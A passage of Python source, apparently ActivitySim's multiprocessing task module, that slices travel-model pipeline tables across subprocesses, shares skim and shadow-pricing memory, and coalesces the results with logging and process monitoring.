(not yet implemented) might be constrained by availability. These situations require special
handling.
::
models:
### mp_initialize step
- initialize_landuse
- compute_accessibility
- initialize_households
### mp_households step
- school_location
- workplace_location
- auto_ownership_simulate
- free_parking
### mp_summarize step
- write_tables
multiprocess_steps:
- name: mp_initialize
begin: initialize_landuse
- name: mp_households
begin: school_location
num_processes: 2
slice:
tables:
- households
- persons
- name: mp_summarize
begin: write_tables
The multiprocess_steps setting above annotates the models list to indicate that the simulation
should be broken into three steps.
The first multiprocess_step (mp_initialize) begins with the initialize_landuse step and is
implicity single-process because there is no 'slice' key indicating how to apportion the tables.
This first step includes all models listed in the 'models' setting up until the first step
in the next multiprocess_steps.
The second multiprocess_step (mp_households) starts with the school location model and continues
through auto_ownership_simulate. The 'slice' info indicates that the tables should be sliced by
households, and that persons is a dependent table and so and persons with a ref_col (foreign key
column with the same name as the Households table index) referencing a household record should be
taken to 'belong' to that household. Similarly, any other table that either share an index
(i.e. having the same name) with either the households or persons table, or have a ref_col to
either of their indexes, should also be considered a dependent table.
The num_processes setting of 2 indicates that the pipeline should be split in two, and half of the
households should be apportioned into each subprocess pipeline, and all dependent tables should
likewise be apportioned accordingly. All other tables (e.g. land_use) that do share an index (name)
or have a ref_col should be considered mirrored and be included in their entirety.
The primary table is sliced by num_processes-sized strides. (e.g. for num_processes == 2, the
sub-processes get every second record starting at offsets 0 and 1 respectively. All other dependent
tables slices are based (directly or indirectly) on this primary stride segmentation of the primary
table index.
Two separate sub-process are launched (num_processes == 2) and each passed the name of their
apportioned pipeline file. They execute independently and if they terminate successfully, their
contents are then coalesced into a single pipeline file whose tables should then be essentially
the same as it had been generated by a single process.
We assume that any new tables that are created by the sub-processes are directly dependent on the
previously primary tables or are mirrored. Thus we can coalesce the sub-process pipelines by
concatenating the primary and dependent tables and simply retaining any copy of the mirrored tables
(since they should all be identical.)
The third multiprocess_step (mp_summarize) then is handled in single-process mode and runs the
write_tables model, writing the results, but also leaving the tables in the pipeline, with
essentially the same tables and results as if the whole simulation had been run as a single process.
"""
"""
shared data
Although multiprocessing subprocesses each have their (apportioned) pipeline, they also share some
data passed to them by the parent process. There are essentially two types of shared data.
read-only shared data
Skim files are read-only and take up a lot of RAM, so we share them across sub-processes, loading
them into shared-memory (multiprocessing.sharedctypes.RawArray) in the parent process and passing
them to the child sub-processes when they are launched/forked. (unlike ordinary python data,
sharedctypes are not pickled and reconstituted, but passed through to the subprocess by address
when launch/forked multiprocessing.Process. Since they are read-only, no Locks are required to
access their data safely. The receiving process needs to know to wrap them using numpy.frombuffer
but they can thereafter be treated as ordinary numpy arrays.
read-write shared memory
There are a few circumstances in which the assumption of row independence breaks down.
This happens if the model must respect some aggregated resource or constraint such as school
enrollments or parking availability. In these cases, the individual choice models have to be
influenced or constrained in light of aggregate choices.
Currently school and workplace location choice are the only such aggregate constraints.
The details of these are handled by the shadow_pricing module (q.v.), and our only concern here
is the need to provide shared read-write data buffers for communication between processes.
It is worth noting here that the shared buffers are instances of multiprocessing.Array which
incorporates a multiprocessing.Lock object to mediate access of the underlying data. You might
think that the existence of such a lock would make shared access pretty straightforward, but
this is not the case as the level of locking is very low, reportedly not very performant, and
essentially useless in any event since we want to use numpy.frombuffer to wrap and handle them
as numpy arrays. The Lock is a convenient bundled locking primative, but shadow_pricing rolls
its own semaphore system using the Lock.
FIXME - The code below knows that it need to allocate skim and shadow price buffers by calling
the appropriate methods in abm.tables.skims and abm.tables.shadow_pricing to allocate shared
buffers. This is not very extensible and should be generalized.
"""
# FIXME - pathological knowledge of abm.tables.skims and abm.tables.shadow_pricing (see note above)
def log(msg, level, write_to_log_file=True):
process_name = multiprocessing.current_process().name
if not write_to_log_file:
print(f"############ mp_tasks - {process_name} - {msg}")
if write_to_log_file:
with config.open_log_file('mp_tasks_log.txt', 'a') as log_file:
print(f"mp_tasks - {process_name} - {msg}", file=log_file)
if write_to_log_file:
# logger.log(level, f"mp_tasks - {process_name} - {msg}")
logger.log(level, msg)
def debug(msg, write_to_log_file=True):
log(msg, level=logging.DEBUG, write_to_log_file=write_to_log_file)
def info(msg, write_to_log_file=True):
log(msg, level=logging.INFO, write_to_log_file=write_to_log_file)
def warning(msg, write_to_log_file=True):
log(msg, level=logging.WARNING, write_to_log_file=write_to_log_file)
def error(msg, write_to_log_file=True):
log(msg, level=logging.ERROR, write_to_log_file=write_to_log_file)
def exception(msg, write_to_log_file=True):
process_name = multiprocessing.current_process().name
if not write_to_log_file:
print(f"mp_tasks - {process_name} - {msg}")
print(f"---\n{traceback.format_exc()}---")
with config.open_log_file('mp_tasks_log.txt', 'a') as log_file:
print(f"---\nmp_tasks - {process_name} - {msg}", file=log_file)
traceback.print_exc(limit=10, file=log_file)
print("---", file=log_file)
if write_to_log_file:
logger.log(logging.ERROR, f"mp_tasks - {process_name} - {msg}")
logger.log(logging.ERROR, f"\n---\n{traceback.format_exc()}---\n")
"""
### child process methods (called within sub process)
"""
def pipeline_table_keys(pipeline_store):
"""
return dict of current (as of last checkpoint) pipeline tables
and their checkpoint-specific hdf5_keys
This facilitates reading pipeline tables directly from a 'raw' open pandas.HDFStore without
opening it as a pipeline (e.g. when apportioning and coalescing pipelines)
We currently only ever need to do this from the last checkpoint, so the ability to specify
checkpoint_name is not required, and thus omitted.
Parameters
----------
pipeline_store : open hdf5 pipeline_store
Returns
-------
checkpoint_name : name of the checkpoint
checkpoint_tables : dict {<table_name>: <table_key>}
"""
checkpoints = pipeline_store[pipeline.CHECKPOINT_TABLE_NAME]
# don't currently need this capability...
# if checkpoint_name:
# # specified checkpoint row as series
# i = checkpoints[checkpoints[pipeline.CHECKPOINT_NAME] == checkpoint_name].index[0]
# checkpoint = checkpoints.loc[i]
# else:
# last checkpoint row as series
checkpoint = checkpoints.iloc[-1]
checkpoint_name = checkpoint.loc[pipeline.CHECKPOINT_NAME]
# series with table name as index and checkpoint_name as value
checkpoint_tables = checkpoint[~checkpoint.index.isin(pipeline.NON_TABLE_COLUMNS)]
# omit dropped tables with empty checkpoint name
checkpoint_tables = checkpoint_tables[checkpoint_tables != '']
# hdf5 key is <table_name>/<checkpoint_name>
checkpoint_tables = {table_name: pipeline.pipeline_table_key(table_name, checkpoint_name)
for table_name, checkpoint_name in checkpoint_tables.items()}
# checkpoint name and series mapping table name to hdf5 key for tables in that checkpoint
return checkpoint_name, checkpoint_tables
def build_slice_rules(slice_info, pipeline_tables):
"""
based on slice_info for current step from run_list, generate a recipe for slicing
the tables in the pipeline (passed in tables parameter)
slice_info is a dict with two well-known keys:
'tables': required list of table names (order matters!)
'except': optional list of tables not to slice even if they have a sliceable index name
Note: tables listed in slice_info must appear in same order and before any others in tables dict
The index of the first table in the 'tables' list is the primary_slicer.
Any other tables listed are dependent tables with either ref_cols to the primary_slicer
or with the same index (i.e. having an index with the same name). This cascades, so any
tables dependent on the primary_table can in turn have dependent tables that will be sliced
by index or ref_col.
For instance, if the primary_slicer is households, then persons can be sliced because it
has a ref_col to (column with the same same name as) the household table index. And the
tours table can be sliced since it has a ref_col to persons. Tables can also be sliced
by index. For instance the person_windows table can be sliced because it has an index with
the same names as the persons table.
slice_info from multiprocess_steps
::
slice:
tables:
- households
- persons
tables from pipeline
+-----------------+--------------+---------------+
| Table Name | Index | ref_col |
+=================+==============+===============+
| households | household_id | |
+-----------------+--------------+---------------+
| persons | person_id | household_id |
+-----------------+--------------+---------------+
| person_windows | person_id | |
+-----------------+--------------+---------------+
| accessibility | zone_id | |
+-----------------+--------------+---------------+
generated slice_rules dict
::
households:
slice_by: primary <- primary table is sliced in num_processors-sized strides
persons:
source: households
slice_by: column
column: household_id <- slice by ref_col (foreign key) to households
person_windows:
source: persons
slice_by: index <- slice by index of persons table
accessibility:
slice_by: <- mirrored (non-dependent) tables don't get sliced
land_use:
slice_by:
Parameters
----------
slice_info : dict
'slice' info from run_list for this step
pipeline_tables : dict {<table_name>, <pandas.DataFrame>}
dict of all tables from the pipeline keyed by table name
Returns
-------
slice_rules : dict
"""
slicer_table_names = slice_info['tables']
slicer_table_exceptions = slice_info.get('except', [])
primary_slicer = slicer_table_names[0]
# - ensure that tables listed in slice_info appear in correct order and before any others
tables = OrderedDict([(table_name, None) for table_name in slicer_table_names])
for table_name in pipeline_tables.keys():
tables[table_name] = pipeline_tables[table_name]
if primary_slicer not in tables:
raise RuntimeError("primary slice table '%s' not in pipeline" % primary_slicer)
# allow wildcard 'True' to avoid slicing (or coalescing) any tables no explicitly listed in slice_info.tables
# populationsim uses slice.except wildcards to avoid listing control tables (etc) that should not be sliced,
# followed by a slice.coalesce directive to explicitly list the omnibus tables created by the subprocesses.
# So don't change this behavior withoyt testing populationsim multiprocess!
if slicer_table_exceptions is True:
debug(f"slice.except wildcard (True): excluding all tables not explicitly listed in slice.tables")
slicer_table_exceptions = [t for t in tables if t not in slicer_table_names]
# dict mapping slicer table_name to index name
# (also presumed to be name of ref col name in referencing table)
slicer_ref_cols = OrderedDict()
if slicer_table_exceptions == '*':
slicer_table_exceptions = [t for t in tables if t not in slicer_table_names]
# build slice rules for loaded tables
slice_rules = OrderedDict()
for table_name, df in tables.items():
rule = {}
if table_name == primary_slicer:
# slice primary apportion table
rule = {'slice_by': 'primary'}
elif table_name in slicer_table_exceptions:
rule['slice_by'] = None
else:
for slicer_table_name in slicer_ref_cols:
if df.index.name is not None and (df.index.name == tables[slicer_table_name].index.name):
# slice df with same index name as a known slicer
rule = {'slice_by': 'index', 'source': slicer_table_name}
else:
# if df has a column with same name as the ref_col (index) of a slicer?
try:
source, ref_col = next((t, c)
for t, c in slicer_ref_cols.items()
if c in df.columns)
# then we can use that table to slice this df
rule = {'slice_by': 'column',
'column': ref_col,
'source': source}
except StopIteration:
rule['slice_by'] = None
if rule['slice_by']:
# cascade sliceability
slicer_ref_cols[table_name] = df.index.name
slice_rules[table_name] = rule
for table_name, rule in slice_rules.items():
if rule['slice_by'] is not None:
debug(f"### table_name: {table_name} slice_rules: {slice_rules[table_name]}")
debug(f"### slicer_ref_cols: {slicer_ref_cols}")
return slice_rules
def apportion_pipeline(sub_proc_names, step_info):
"""
apportion pipeline for multiprocessing step
create pipeline files for sub_procs, apportioning data based on slice_rules
Called at the beginning of a multiprocess step prior to launching the sub-processes
Pipeline files have well known names (pipeline file name prefixed by subjob name)
Parameters
----------
sub_proc_names : list of str
names of the sub processes to apportion
step_info : dict
step_info from multiprocess_steps for step we are apportioning pipeline tables for
Returns
-------
creates apportioned pipeline files for each sub job
"""
slice_info = step_info.get('slice', None)
multiprocess_step_name = step_info.get('name', None)
pipeline_file_name = inject.get_injectable('pipeline_file_name')
# ensure that if we are resuming, we don't apportion any tables from future model steps
last_checkpoint_in_previous_multiprocess_step = step_info.get('last_checkpoint_in_previous_multiprocess_step', None)
assert last_checkpoint_in_previous_multiprocess_step is not None
pipeline.open_pipeline(resume_after=last_checkpoint_in_previous_multiprocess_step)
# ensure all tables are in the pipeline
checkpointed_tables = pipeline.checkpointed_tables()
for table_name in slice_info['tables']:
if table_name not in checkpointed_tables:
raise RuntimeError(f"slicer table {table_name} not found in pipeline")
checkpoints_df = pipeline.get_checkpoints()
# for the subprocess pipelines, keep only the last row of checkpoints and patch the last checkpoint name
checkpoints_df = checkpoints_df.tail(1).copy()
# load all tables from pipeline
checkpoint_name = multiprocess_step_name
tables = {}
for table_name in checkpointed_tables:
# patch last checkpoint name for all tables
checkpoints_df[table_name] = checkpoint_name
# load the dataframe
tables[table_name] = pipeline.get_table(table_name)
debug(f"loaded table {table_name} {tables[table_name].shape}")
pipeline.close_pipeline()
# should only be one checkpoint (named <multiprocess_step_name>)
assert len(checkpoints_df) == 1
# - build slice rules for loaded tables
slice_rules = build_slice_rules(slice_info, tables)
# - allocate sliced tables for each sub_proc
num_sub_procs = len(sub_proc_names)
for i in range(num_sub_procs):
# use well-known pipeline file name
process_name = sub_proc_names[i]
pipeline_path = config.build_output_file_path(pipeline_file_name, use_prefix=process_name)
# remove existing file
try:
os.unlink(pipeline_path)
except OSError:
pass
with pd.HDFStore(pipeline_path, mode='a') as pipeline_store:
# remember sliced_tables so we can cascade slicing to other tables
sliced_tables = {}
# - for each table in pipeline
for table_name, rule in slice_rules.items():
df = tables[table_name]
if rule['slice_by'] is not None and num_sub_procs > len(df):
# almost certainly a configuration error
raise RuntimeError(f"apportion_pipeline: multiprocess step {multiprocess_step_name} "
f"slice table {table_name} has fewer rows {df.shape} "
f"than num_processes ({num_sub_procs}).")
if rule['slice_by'] == 'primary':
# slice primary apportion table by num_sub_procs strides
# this hopefully yields a more random distribution
# (e.g.) households are ordered by size in input store
# we are assuming that the primary table index is unique
# otherwise we should slice by strides in df.index.unique
# we could easily work around this, but it seems likely this was an error on the user's part
assert not df.index.duplicated().any()
primary_df = df[np.asanyarray(list(range(df.shape[0]))) % num_sub_procs == i]
sliced_tables[table_name] = primary_df
elif rule['slice_by'] == 'index':
# slice a table with same index name as a known slicer
source_df = sliced_tables[rule['source']]
sliced_tables[table_name] = df.loc[source_df.index]
elif rule['slice_by'] == 'column':
# slice a table with a recognized slicer_column
source_df = sliced_tables[rule['source']]
sliced_tables[table_name] = df[df[rule['column']].isin(source_df.index)]
elif rule['slice_by'] is None:
# don't slice mirrored tables
sliced_tables[table_name] = df
else:
raise RuntimeError("Unrecognized slice rule '%s' for table %s" %
(rule['slice_by'], table_name))
# - write table to pipeline
hdf5_key = pipeline.pipeline_table_key(table_name, checkpoint_name)
pipeline_store[hdf5_key] = sliced_tables[table_name]
debug(f"writing checkpoints ({checkpoints_df.shape}) "
f"to {pipeline.CHECKPOINT_TABLE_NAME} in {pipeline_path}")
pipeline_store[pipeline.CHECKPOINT_TABLE_NAME] = checkpoints_df
def coalesce_pipelines(sub_proc_names, slice_info):
"""
Coalesce the data in the sub_processes apportioned pipelines back into a single pipeline
We use slice_rules to distinguish sliced (apportioned) tables from mirrored tables.
Sliced tables are concatenated to create a single omnibus table with data from all sub_procs
but mirrored tables are the same across all sub_procs, so we can grab a copy from any pipeline.
Parameters
----------
sub_proc_names : list of str
slice_info : dict
slice_info from multiprocess_steps
Returns
-------
creates an omnibus pipeline with coalesced data from individual sub_proc pipelines
"""
pipeline_file_name = inject.get_injectable('pipeline_file_name')
debug(f"coalesce_pipelines to: {pipeline_file_name}")
# - read all tables from first process pipeline
# FIXME - note: assumes any new tables will be present in ALL subprocess pipelines
tables = {}
pipeline_path = config.build_output_file_path(pipeline_file_name, use_prefix=sub_proc_names[0])
with pd.HDFStore(pipeline_path, mode='r') as pipeline_store:
# hdf5_keys is a dict mapping table_name to pipeline hdf5_key
checkpoint_name, hdf5_keys = pipeline_table_keys(pipeline_store)
for table_name, hdf5_key in hdf5_keys.items():
debug(f"loading table {table_name} {hdf5_key}")
tables[table_name] = pipeline_store[hdf5_key]
# slice.coalesce is an override list of omnibus tables created by subprocesses that should be coalesced,
# whether or not they satisfy the slice rules. Ordinarily all tables qualify for slicing by the slice rules
# will be coalesced, including any new tables created by the subprocess that have sliceable indexes or ref_cols.
# Any other new tables that don't match the slice rules will be considered mirrored. This is usually the desired
# behavior, especially in activitysim abm models. However, if the "slice.except: True" wildcard is used, it
# prevents the inference for newly generated tables, and this directive permits explicit specification of
# which new tables to coalesce. Populationsim uses this wildcard except directives to avoid having to list
# many slice exceptions, and just lists weigh tables to coalesce. So don't change this behavior without testing
# populationsim multiprocessing!
coalesce_tables = slice_info.get('coalesce', [])
# report absence of any slice_info.coalesce tables not in pipeline
# we don't require their presence in case there are tracing tables that will only be present if tracing is enabled
for table_name in coalesce_tables:
if table_name not in tables:
logger.warning("slicer coalesce.table %s not found in pipeline" % table_name)
# - use slice rules followed by apportion_pipeline to identify mirrored tables
# (tables that are identical in every pipeline and so don't need to be concatenated)
slice_rules = build_slice_rules(slice_info, tables)
# table is mirrored if no slice rule or explicitly listed in slice_info.coalesce setting
mirrored_table_names = \
[t for t, rule in slice_rules.items() if rule['slice_by'] is None and t not in coalesce_tables]
mirrored_tables = {t: tables[t] for t in mirrored_table_names}
omnibus_keys = {t: k for t, k in hdf5_keys.items() if t not in mirrored_table_names}
debug(f"coalesce_pipelines to: {pipeline_file_name}")
debug(f"mirrored_table_names: {mirrored_table_names}")
debug(f"omnibus_keys: {omnibus_keys}")
# assemble lists of omnibus tables from all sub_processes
omnibus_tables = {table_name: [] for table_name in omnibus_keys}
for process_name in sub_proc_names:
pipeline_path = config.build_output_file_path(pipeline_file_name, use_prefix=process_name)
logger.info(f"coalesce pipeline {pipeline_path}")
with pd.HDFStore(pipeline_path, mode='r') as pipeline_store:
for table_name, hdf5_key in omnibus_keys.items():
omnibus_tables[table_name].append(pipeline_store[hdf5_key])
# open pipeline, preserving existing checkpoints (so resume_after will work for prior steps)
pipeline.open_pipeline('_')
# - add mirrored tables to pipeline
for table_name in mirrored_tables:
df = mirrored_tables[table_name]
info(f"adding mirrored table {table_name} {df.shape}")
pipeline.replace_table(table_name, df)
# - concatenate omnibus tables and add them to pipeline
for table_name in omnibus_tables:
df = pd.concat(omnibus_tables[table_name], sort=False)
info(f"adding omnibus table {table_name} {df.shape}")
pipeline.replace_table(table_name, df)
pipeline.add_checkpoint(checkpoint_name)
pipeline.close_pipeline()
def setup_injectables_and_logging(injectables, locutor=True):
"""
Setup injectables (passed by parent process) within sub process
we sometimes want only one of the sub-processes to perform an action (e.g. write shadow prices)
the locutor flag indicates that this sub process is the designated singleton spokesperson
Parameters
----------
injectables : dict {<injectable_name>: <value>}
dict of injectables passed by parent process
locutor : bool
is this sub process the designated spokesperson
Returns
-------
injects injectables
"""
# register abm steps and other abm-specific injectables
# by default, assume we are running activitysim.abm
# other callers (e.g. piopulationsim) will have to arrange to register their own steps and injectables
# (presumably) in a custom run_simulation.py instead of using the 'activitysim run' command
if not inject.is_injectable('preload_injectables'):
from activitysim import abm # register abm steps and other abm-specific injectables
try:
for k, v in injectables.items():
inject.add_injectable(k, v)
inject.add_injectable('is_sub_task', True)
inject.add_injectable('locutor', locutor)
config.filter_warnings()
process_name = multiprocessing.current_process().name
inject.add_injectable("log_file_prefix", process_name)
except Exception as e:
exception(f"{type(e).__name__} exception while setting up injectables: {str(e)}", write_to_log_file=False)
raise e
try:
tracing.config_logger()
except Exception as e:
exception(f"{type(e).__name__} exception while configuring logger: {str(e)}")
raise e
def adjust_chunk_size_for_shared_memory(chunk_size, data_buffers, num_processes):
# even if there is only one subprocess,
# we are separate from parent who allocated the shared memory
# so we still need to compensate for it
if chunk_size == 0:
return chunk_size
shared_memory_size = mem.shared_memory_size(data_buffers)
if shared_memory_size == 0:
return chunk_size
fair_share_of_shared_memory = int(shared_memory_size / num_processes)
adjusted_chunk_size = chunk_size - fair_share_of_shared_memory
logger.info(f"adjust_chunk_size_for_shared_memory "
f"adjusted_chunk_size {util.INT(adjusted_chunk_size)} "
f"chunk_size {util.INT(chunk_size)} "
f"shared_memory_size {util.INT(shared_memory_size)} "
f"num_processes {num_processes} "
f"fair_share_of_shared_memory {util.INT(fair_share_of_shared_memory)} ")
if adjusted_chunk_size <= 0:
raise RuntimeError(f"adjust_chunk_size_for_shared_memory: chunk_size too small for shared memory. "
f"adjusted_chunk_size: {adjusted_chunk_size}")
return adjusted_chunk_size
def run_simulation(queue, step_info, resume_after, shared_data_buffer):
"""
run step models as subtask
called once to run each individual sub process in multiprocess step
Unless actually resuming resuming, resume_after will be None for first step,
and then FINAL for subsequent steps so pipelines opened to resume where previous step left off
Parameters
----------
queue : multiprocessing.Queue
step_info : dict
step_info for current step from multiprocess_steps
resume_after : str or None
shared_data_buffer : dict
dict of shared data (e.g. skims and shadow_pricing)
"""
# step_label = step_info['name']
models = step_info['models']
chunk_size = step_info['chunk_size']
num_processes = step_info['num_processes']
chunk_size = adjust_chunk_size_for_shared_memory(chunk_size, shared_data_buffer, num_processes)
inject.add_injectable('data_buffers', shared_data_buffer)
inject.add_injectable("chunk_size", chunk_size)
inject.add_injectable("num_processes", num_processes)
if resume_after:
info(f"resume_after {resume_after}")
# if they specified a resume_after model, check to make sure it is checkpointed
if resume_after != LAST_CHECKPOINT and \
resume_after not in pipeline.get_checkpoints()[pipeline.CHECKPOINT_NAME].values:
# if not checkpointed, then fall back to last checkpoint
info(f"resume_after checkpoint '{resume_after}' not in pipeline.")
resume_after = LAST_CHECKPOINT
pipeline.open_pipeline(resume_after)
last_checkpoint = pipeline.last_checkpoint()
if last_checkpoint in models:
info(f"Resuming model run list after {last_checkpoint}")
models = models[models.index(last_checkpoint) + 1:]
assert inject.get_injectable('preload_injectables', None)
t0 = tracing.print_elapsed_time()
for model in models:
t1 = tracing.print_elapsed_time()
try:
pipeline.run_model(model)
except Exception as e:
warning(f"{type(e).__name__} exception running {model} model: {str(e)}")
raise e
tracing.log_runtime(model_name=model, start_time=t1)
queue.put({'model': model, 'time': time.time()-t1})
tracing.print_elapsed_time("run (%s models)" % len(models), t0)
# add checkpoint with final tables even if not intermediate checkpointing
checkpoint_name = step_info['name']
pipeline.add_checkpoint(checkpoint_name)
pipeline.close_pipeline()
"""
### multiprocessing sub-process entry points
"""
def mp_run_simulation(locutor, queue, injectables, step_info, resume_after, **kwargs):
"""
mp entry point for run_simulation
Parameters
----------
locutor
queue
injectables
step_info
resume_after : bool
kwargs : dict
shared_data_buffers passed as kwargs to avoid picking dict
"""
setup_injectables_and_logging(injectables, locutor=locutor)
debug(f"mp_run_simulation {step_info['name']} locutor={inject.get_injectable('locutor', False)} ")
try:
if step_info['num_processes'] > 1:
pipeline_prefix = multiprocessing.current_process().name
logger.debug(f"injecting pipeline_file_prefix '{pipeline_prefix}'")
inject.add_injectable("pipeline_file_prefix", pipeline_prefix)
shared_data_buffer = kwargs
run_simulation(queue, step_info, resume_after, shared_data_buffer)
mem.log_global_hwm() # subprocess
except Exception as e:
exception(f"{type(e).__name__} exception caught in mp_run_simulation: {str(e)}")
raise e
def mp_apportion_pipeline(injectables, sub_proc_names, step_info):
"""
mp entry point for apportion_pipeline
Parameters
----------
injectables : dict
injectables from parent
sub_proc_names : list of str
names of the sub processes to apportion
step_info : dict
step_info for multiprocess_step we are apportioning
"""
setup_injectables_and_logging(injectables)
try:
apportion_pipeline(sub_proc_names, step_info)
except Exception as e:
exception(f"{type(e).__name__} exception caught in mp_apportion_pipeline: {str(e)}")
raise e
def mp_setup_skims(injectables, **kwargs):
"""
Sub process to load skim data into shared_data
There is no particular necessity to perform this in a sub process instead of the parent
except to ensure that this heavyweight task has no side-effects (e.g. loading injectables)
Parameters
----------
injectables : dict
injectables from parent
kwargs : dict
shared_data_buffers passed as kwargs to avoid picking dict
"""
setup_injectables_and_logging(injectables)
info("mp_setup_skims")
try:
shared_data_buffer = kwargs
network_los_preload = inject.get_injectable('network_los_preload', None)
if network_los_preload is not None:
network_los_preload.load_shared_data(shared_data_buffer)
except Exception as e:
exception(f"{type(e).__name__} exception caught in mp_setup_skims: {str(e)}")
raise e
def mp_coalesce_pipelines(injectables, sub_proc_names, slice_info):
"""
mp entry point for coalesce_pipeline
Parameters
----------
injectables : dict
injectables from parent
sub_proc_names : list of str
names of the sub processes to apportion
slice_info : dict
slice_info from multiprocess_steps
"""
setup_injectables_and_logging(injectables)
try:
coalesce_pipelines(sub_proc_names, slice_info)
except Exception as e:
exception(f"{type(e).__name__} exception caught in coalesce_pipelines: {str(e)}")
raise e
"""
### main (parent) process methods
"""
def allocate_shared_skim_buffers():
"""
This is called by the main process to allocate shared memory buffer to share with subprocs
Note: Buffers must be allocated BEFORE network_los.load_data
Returns
-------
skim_buffers : dict {<skim_tag>: <multiprocessing.RawArray>}
"""
info("allocate_shared_skim_buffer")
network_los = inject.get_injectable('network_los_preload', None)
if network_los is not None:
skim_buffers = network_los.allocate_shared_skim_buffers()
else:
skim_buffers = {}
return skim_buffers
def allocate_shared_shadow_pricing_buffers():
"""
This is called by the main process to allocate memory buffer to share with subprocs
Returns
-------
multiprocessing.RawArray
"""
info("allocate_shared_shadow_pricing_buffers")
shadow_pricing_info = inject.get_injectable('shadow_pricing_info', None)
if shadow_pricing_info is not None:
from activitysim.abm.tables import shadow_pricing
shadow_pricing_buffers = shadow_pricing.buffers_for_shadow_pricing(shadow_pricing_info)
else:
shadow_pricing_buffers = {}
return shadow_pricing_buffers
def run_sub_simulations(
injectables,
shared_data_buffers,
step_info, process_names,
resume_after, previously_completed, fail_fast):
"""
Launch sub processes to run models in step according to specification in step_info.
If resume_after is LAST_CHECKPOINT, then pick up where previous run left off, using breadcrumbs
from previous run. If some sub-processes completed in the prior run, then skip rerunning them.
If resume_after specifies a checkpiont, skip checkpoints that precede the resume_after
Drop 'completed' breadcrumbs for this run as sub-processes terminate
Wait for all sub-processes to terminate and return list of those that completed successfully.
Parameters
----------
injectables : dict
values to inject in subprocesses
shared_data_buffers : dict
dict of shared_data for sub-processes (e.g. skim and shadow pricing data)
step_info : dict
step_info from run_list
process_names : list of str
list of sub process names to in parallel
resume_after : str or None
name of simulation to resume after, or LAST_CHECKPOINT to resume where previous run left off
previously_completed : list of str
names of processes that successfully completed in previous run
fail_fast : bool
whether to raise error if a sub process terminates with nonzero exitcode
Returns
-------
completed : list of str
names of sub_processes that completed successfully
"""
def log_queued_messages():
for process, queue in zip(procs, queues):
while not queue.empty():
msg = queue.get(block=False)
model_name = msg['model']
info(f"{process.name} {model_name} : {tracing.format_elapsed_time(msg['time'])}")
mem.trace_memory_info(f"{process.name}.{model_name}.completed")
def check_proc_status():
# we want to drop 'completed' breadcrumb when it happens, lest we terminate
# if fail_fast flag is set raise
for p in procs:
if p.exitcode is None:
pass # still running
elif p.exitcode == 0:
# completed successfully
if p.name not in completed:
info(f"process {p.name} completed")
completed.add(p.name)
drop_breadcrumb(step_name, 'completed', list(completed))
mem.trace_memory_info(f"{p.name}.completed")
else:
# process failed
if p.name not in failed:
warning(f"process {p.name} failed with exitcode {p.exitcode}")
failed.add(p.name)
mem.trace_memory_info(f"{p.name}.failed")
if fail_fast:
warning(f"fail_fast terminating remaining running processes")
for op in procs:
if op.exitcode is None:
try:
info(f"terminating process {op.name}")
op.terminate()
except Exception as e:
info(f"error terminating process {op.name}: {e}")
raise RuntimeError("Process %s failed" % (p.name,))
step_name = step_info['name']
t0 = tracing.print_elapsed_time()
info(f'run_sub_simulations step {step_name} models resume_after {resume_after}')
# if resuming and some processes completed successfully in previous run
if previously_completed:
assert resume_after is not None
assert set(previously_completed).issubset(set(process_names))
if resume_after == LAST_CHECKPOINT:
# if we are resuming where previous run left off, then we can skip running
# any subprocudures that successfully complete the previous run
process_names = [name for name in process_names if name not in previously_completed]
info(f'step {step_name}: skipping {len(previously_completed)} previously completed subprocedures')
else:
# if we are resuming after a specific model, then force all subprocesses to run
# (assuming if they specified a model, they really want everything after that to run)
previously_completed = []
# if not the first step, resume_after the last checkpoint from the previous step
if resume_after is None and step_info['step_num'] > 0:
resume_after = LAST_CHECKPOINT
num_simulations = len(process_names)
procs = []
queues = []
completed = set(previously_completed)
failed = set([]) # so we can log process failure first time it happens
drop_breadcrumb(step_name, 'completed', list(completed))
for i, process_name in enumerate(process_names):
q = multiprocessing.Queue()
locutor = (i == 0)
args = OrderedDict(locutor=locutor,
queue=q,
injectables=injectables,
step_info=step_info,
resume_after=resume_after)
# debug(f"create_process {process_name} target={mp_run_simulation}")
# for k in args:
# debug(f"create_process {process_name} arg {k}={args[k]}")
# for k in shared_data_buffers:
# debug(f"create_process {process_name} shared_data_buffers {k}={shared_data_buffers[k]}")
p = multiprocessing.Process(target=mp_run_simulation, name=process_name,
args=(locutor, q, injectables, step_info, resume_after,),
kwargs=shared_data_buffers)
procs.append(p)
queues.append(q)
# - start processes
for i, p in zip(list(range(num_simulations)), procs):
info(f"start process {p.name}")
p.start()
"""
windows mmap does not handle multiple simultaneous calls from different processes for the same tagname.
Process start causes a call to mmap to initialize the wrapper for the anonymous shared memory arrays
in the shared_data_buffers kwargs. some of the processses fail with WinError 1450 (or similar error)
OSError: [WinError 1450] Insufficient system resources exist to complete the requested service.
Judging by the commented-out assert, this (or a related) issue may have been around in some form for a while.
def __setstate__(self, state):
self.size, self.name = self._state = state
# Reopen existing mmap
self.buffer = mmap.mmap(-1, self.size, tagname=self.name)
# XXX Temporarily preventing buildbot failures while determining
# XXX the correct long-term fix. See issue 23060
#assert _winapi.GetLastError() == _winapi.ERROR_ALREADY_EXISTS
"""
if sys.platform == 'win32':
time.sleep(1)
mem.trace_memory_info(f"{p.name}.start")
while multiprocessing.active_children():
# log queued messages as they are received
log_queued_messages()
# monitor sub process status and drop breadcrumbs or fail_fast as they terminate
check_proc_status()
# monitor memory usage
mem.trace_memory_info("run_sub_simulations.idle", trace_ticks=mem.MEM_PARENT_TRACE_TICK_LEN)
time.sleep(1)
# clean up any messages or breadcrumbs that occurred while we slept
log_queued_messages()
check_proc_status()
# no need to join() explicitly since multiprocessing.active_children joins completed procs
for p in procs:
assert p.exitcode is not None
if p.exitcode:
error(f"Process %s failed with exitcode {p.exitcode}")
assert p.name in failed
else:
info(f"Process {p.name} completed with exitcode {p.exitcode}")
assert p.name in completed
t0 = tracing.print_elapsed_time('run_sub_simulations step %s' % step_name, t0)
return list(completed)
def run_sub_task(p):
"""
Run process p synchroneously,
Return when sub process terminates, or raise error if exitcode is nonzero
Parameters
----------
p : multiprocessing.Process
"""
info(f"#run_model running sub_process {p.name}")
mem.trace_memory_info(f"{p.name}.start")
t0 = tracing.print_elapsed_time()
p.start()
while multiprocessing.active_children():
mem.trace_memory_info("run_sub_simulations.idle", trace_ticks=mem.MEM_PARENT_TRACE_TICK_LEN)
time.sleep(1)
# no need to join explicitly since multiprocessing.active_children joins completed procs
# p.join()
t0 = tracing.print_elapsed_time('#run_model sub_process %s' % p.name, t0)
